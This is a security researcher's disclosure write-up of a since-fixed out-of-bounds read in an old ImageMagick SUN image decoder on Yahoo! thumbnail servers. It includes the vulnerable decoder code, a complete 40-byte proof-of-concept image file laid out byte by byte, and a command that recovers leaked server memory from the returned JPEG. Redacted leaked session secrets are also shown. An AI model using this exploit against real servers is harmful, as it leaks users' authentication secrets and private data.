*bleed, more powerful: dumping Yahoo! authentication secrets with an out-of-bounds read

Overview

In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.

Visualization


The above patch of noise is a PNG (i.e lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:
  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.
But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an uptodate ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Box.com? Interestingly enough, the crash file doesn't seem to crash anything but all the test files do seem to render instead of failing cleanly as would be expected with an uptodate ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned out about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    sun_info.width=ReadBlobMSBLong(image);
    sun_info.height=ReadBlobMSBLong(image);
    sun_info.depth=ReadBlobMSBLong(image);
    sun_info.length=ReadBlobMSBLong(image);
[...]
    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
      ThrowReaderException(CorruptImageError,"ImproperImageHeader");
    bytes_per_line=sun_info.width*sun_info.depth;
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
      sizeof(*sun_data));
[...]
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)
      ThrowReaderException(CorruptImageError,"UnableToReadImageData");

    sun_pixels=sun_data;
    bytes_per_line=0;
[...]
    p=sun_pixels;
    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
      {
        q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
        if (q == (Quantum *) NULL)
          break;
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
        {
          for (bit=7; bit >= 0; bit--)
          {
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),
              q);
            q+=GetPixelChannels(image);
          }
          p++;
        }

So in the case of an image with a depth of 1, we see a fairly straightforward problem:
  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:


59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.

Exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the vizualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human visualization is more sensitive to color brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.

The strings and secrets

So now that we have a reliable and likely byte perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high entropy strings,

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;a=yahoo.mobstor.client.mailtsusm2.prod;h=10.210.245.245;t=redacted;k=4;s=redacted

https://dl-mail.ymail.com/ws/download/mailboxes/@.id==redacted/messages/@.id==redacted/content/parts/@.id==2/raw?appid=getattachment&token=redacted&ymreqid=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there's some paths, error messages and versions strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

/usr/lib64/ImageMagick-6.8.9/modules-Q16/coders/sun.so
ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25 http://www.imagemagick.org
unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.

Conclusion

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)